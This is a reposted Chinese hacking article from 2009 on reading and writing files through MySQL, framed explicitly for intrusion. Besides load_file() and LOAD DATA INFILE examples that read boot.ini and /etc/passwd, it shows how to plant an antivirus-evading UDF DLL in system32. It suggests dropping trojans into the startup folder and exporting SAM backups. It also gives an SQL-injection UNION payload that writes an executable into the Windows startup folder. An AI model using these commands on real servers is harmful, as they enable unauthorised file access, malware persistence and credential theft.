当前位置: 代码网 > 服务器>网络安全>企业安全 > mysql 读取文件的几种方式及应用

mysql 读取文件的几种方式及应用

2009年04月20日 企业安全 我要评论
mysql 读取文件的几种方式及应用章出处:C.R.S.T 作者:sai52[B.H.S.T] blog:www.sai52.com 今天朋友问我如何在mysql下读取文件,把我问愣了,发现自己还是犯了不求甚解的毛病,因此特地查了下mysql使用手册。 思... 09-04-20
章出处:c.r.s.t
作者:sai52[b.h.s.t]
blog:www.sai52.com

今天朋友问我如何在mysql下读取文件,把我问愣了,发现自己还是犯了不求甚解的毛病,因此特地查了下mysql使用手册。
思路都一样,在拥有file权限的前提下,读取文件为字符串形式插入表中,然后读出表中数据,只是方式略有不同

mysql3.x下

不确定mysql3.x下能否使用load_file()函数(我在mysql3使用手册上没有查到,但貌似是可以的),用 load data infile 读取文件,命令如下

mysql>create table a (cmd text);
mysql>load data infile 'c:\\boot.ini' into table a;
mysql>select * from a;

mysql4.x下

mysql4.x下除了 load data infile 外还可以用大家熟知的 load_file() 来读取,命令如下

mysql>create table a (cmd text);
mysql>insert into a (cmd) values (load_file('c:\\boot.ini'));
mysql>select * from a;

mysql5.x下

在linux下,mysql5.x 除了上面两种方法,还可以利用 system 直接执行系统命令的方式来读取文件(是否必须root身份不确定,未测试),命令如下

mysql>system cat /etc/passwd


mysql下读取文件在入侵中用到的时候不多,可能用于查询配置文件寻找web路径,或者webshell权限很小的时候读取其他格式的webshell内容然后用into outfile方式写入大马等,二进制文件也可以这样用,只是多了hex()和unhex()的工序。


例:把免杀过的udf.dll文件插入系统目录

create table a (cmd longblob);
insert into a (cmd) values (hex(load_file('c:\\windows\\temp\\udf.dll')));
select unhex(cmd) from a into dumpfile 'c:\\windows\\system32\\udf.dll';

其他的利用方法也很多,如把木马文件写入启动项,或者把加工过的cmd.exe文件导出到系统根目录下,把sam备份导出到可读目录等等,注入中理论上应该也可以这样用(在不知道web路径又可以导出文件的情况下),大家自由发挥吧。


注入中的语法


[copy to clipboard] [ - ]code:


id=xxx and 1=2 union select 1,2,3,unhex(mm.exe的十六进制),5 into dumpfile 'c:/documents and settings/all users/「开始」菜单/程序/启动/mm.exe'/*
测试后发现注入中运用不太现实,因为要导出二进制文件要求必须数据类型为blob或longblob,现实中极少用到。
(0)

相关文章:

  • 网页挂马详细步骤教程

    网页挂马详细步骤教程

    网页挂马详细步骤教程其实很简单的的,说到原理,就一个:就是在人家网站的主页那里插入一个自己的网马的页面,等有漏洞的人查看了人家网站的主页,那么他就成了你的肉鸡... [阅读全文]
  • 弹窗口的流氓软件核心代码

    弹窗口的流氓软件核心代码

    弹窗口的流氓软件核心代码ps:请勿用于非法用途,仅供技术研究之用。 by:yunshu 这个东西的主要功能就是去网上一个URL读取配置文件,拿到需要弹出的窗口... [阅读全文]
  • CSRF—攻击与防御

    CSRF—攻击与防御

    CSRF—攻击与防御 0x01 什么是CSRF攻击CSRF是Cross Site Request Forgery的缩写(也缩写为XSRF),直译过来就是跨站请... [阅读全文]
  • 黑客入侵网络的五十种方法

    黑客入侵网络的五十种方法

    黑客入侵网络的五十种方法 现在网上的攻击事件越来越多,黑客都是通过什么方法来攻击我们的呢?下面我们给大家总结了黑客入侵网络的五十种方法,让大家做到有备无患。 ... [阅读全文]
  • 实战讲解跨站入侵攻击

    实战讲解跨站入侵攻击 很多时候在企业网络安全,特别是服务器上数据库安全防范方面需要特别注意,弥补所有漏洞,减少因设置不当带来的入侵事件的发生。然而在实际使用与维护过程中我们经常会…

    2008年10月08日 网络安全
  • 关于趋势科技等网站被攻击的分析

    关于趋势科技等网站被攻击的分析

    关于趋势科技等网站被攻击的分析 一. 首先在网上找到了这次攻击的新闻报道http://www.nsfocus.net/news/6697 http://hi.... [阅读全文]

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论

验证码:
Copyright © 2017-2025  代码网 保留所有权利. 粤ICP备2024248653号
站长QQ:2386932994 | 联系邮箱:2386932994@qq.com